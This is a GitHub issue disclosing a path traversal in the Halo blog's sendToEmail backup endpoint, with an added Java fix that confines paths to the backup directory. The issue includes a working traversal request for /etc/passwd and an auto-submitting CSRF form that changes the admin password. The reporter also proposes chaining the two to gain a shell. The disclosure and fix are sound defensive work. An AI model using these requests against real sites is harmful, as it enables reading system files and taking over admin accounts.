
There is a file download vulnerability #130

Closed
4 of 6 tasks
Artemis1029 opened this issue Apr 4, 2019 · 1 comment
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability

Comments


Artemis1029 commented Apr 4, 2019

I confirm that I have checked (mark with [ ] or [x])

I want to request (mark with [ ] or [x]):

  • Bug report
  • Add a new feature or function
  • Request technical support

Bug Report

I found that your system has a feature that allows the user to send the backup file by email : )
code:

    @GetMapping(value = "sendToEmail")
    @ResponseBody
    public JsonResult sendToEmail(@RequestParam("fileName") String fileName,
                                  @RequestParam("type") String type,
                                  HttpSession session) {
        // type and fileName come straight from the request and are concatenated unvalidated
        final String srcPath = System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;
        final User user = (User) session.getAttribute(USER_SESSION_KEY);
        if (null == user.getUserEmail() || StrUtil.isEmpty(user.getUserEmail())) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.backup.no-email"));
        }
        if (StrUtil.equals(OPTIONS.get(BlogPropertiesEnum.SMTP_EMAIL_ENABLE.getProp()), TrueFalseEnum.FALSE.getDesc())) {
            return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.no-post"));
        }
        // the resolved path is mailed to the logged-in user's address
        new EmailToAdmin(srcPath, user).start();
        return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.backup.email-success"));
    }

You do no filtering of fileName and type from user input in

System.getProperties().getProperty("user.home") + "/halo/backup/" + type + "/" + fileName;

so I can use a type of ../../../../ to download any file I want~
as in this HTTP request:

GET /admin/backup/sendToEmail?type=../../../../../../../&fileName=etc/passwd HTTP/1.1
Host: *********
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
X-Requested-With: XMLHttpRequest
Connection: close
Cookie:
X-Forwarded-For: 127.0.0.2

and I received the file:
[image]
Open it
[image]
~
But how can I sign in as the admin? XD
I find that you have no CSRF protection in the code, so I can use

<html>
  <body>
    <form action="http://youryhostname/admin/profile/save" method="POST" id="test">
      <input type="hidden" name="userId" value="1" />
      <input type="hidden" name="userPass" value="7fef6171469e80d32c0559f88b377245" />
      <!-- password is admin888 -->
      <input type="hidden" name="userName" value="Art3mis" />
      <input type="hidden" name="userDisplayName" value="a" />
      <input type="hidden" name="userEmail" value="art3mis&#64;art3mis&#46;top" />
      <input type="hidden" name="userAvatar" value="" />
      <input type="hidden" name="userDesc" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var f=document.getElementById("test");
    f.submit();
  </script>
</html>

I can leave a URL in a message with the HTML, and when you click it, your password will change to admin888, and I can read your system files to get a shell~
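The traversal above works because `type` and `fileName` are joined into a path string without any check that the result still lies under the backup directory. The following is an added example of how such a lookup can be hardened; it is not code from the Halo project, and the class name `BackupPathResolver` and method `resolve` are assumptions for illustration. It rejects any value that is not a single plain path segment and, as a second layer, verifies the normalized path still starts with the backup root.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

public final class BackupPathResolver {

    // Directory the endpoint is allowed to read from (mirrors the
    // user.home + "/halo/backup" prefix used by sendToEmail above).
    private final Path backupRoot;

    public BackupPathResolver(Path backupRoot) {
        // Normalize once so every later comparison is against an absolute, clean root.
        this.backupRoot = backupRoot.toAbsolutePath().normalize();
    }

    /**
     * Returns the canonical file path for type/fileName under the backup root,
     * or null when either value is not a single path segment or the resolved
     * path would escape the root (e.g. via "../" segments).
     */
    public Path resolve(String type, String fileName) {
        if (!isSingleSegment(type) || !isSingleSegment(fileName)) {
            return null;
        }
        Path candidate = backupRoot.resolve(type).resolve(fileName).normalize();
        // Defence in depth: even with the segment check, insist the result stays inside the root.
        if (!candidate.startsWith(backupRoot)) {
            return null;
        }
        return candidate;
    }

    // A plain segment: non-empty, not "." or "..", no separators, no NUL byte.
    private static boolean isSingleSegment(String s) {
        return s != null && !s.isEmpty()
                && !s.equals(".") && !s.equals("..")
                && s.indexOf('/') < 0 && s.indexOf('\\') < 0
                && s.indexOf('\0') < 0;
    }

    public static void main(String[] args) {
        Path root = Paths.get(System.getProperty("user.home"), "halo", "backup");
        BackupPathResolver r = new BackupPathResolver(root);
        // Constructed sample names: a legitimate backup resolves, the traversal from the report does not.
        System.out.println(r.resolve("resources", "site-backup.zip"));       // <root>/resources/site-backup.zip
        System.out.println(r.resolve("../../../../../../../", "etc/passwd")); // null
    }
}
```

If the backup directory may contain symbolic links, compare against `toRealPath()` of both sides rather than `normalize()` alone. The CSRF part of the report is a separate fix (a per-session token checked on state-changing POSTs, such as Spring Security's CSRF filter) and is not covered by this example.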

@ruibaby ruibaby added the kind/bug Categorizes issue or PR as related to a bug. label Apr 4, 2019
@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 4, 2019
ruibaby (Member) commented May 28, 2019

Preparing to release v1, so closing this issue.

@ruibaby ruibaby closed this as completed May 28, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
* refactor: login page

* feat: halo-dev#130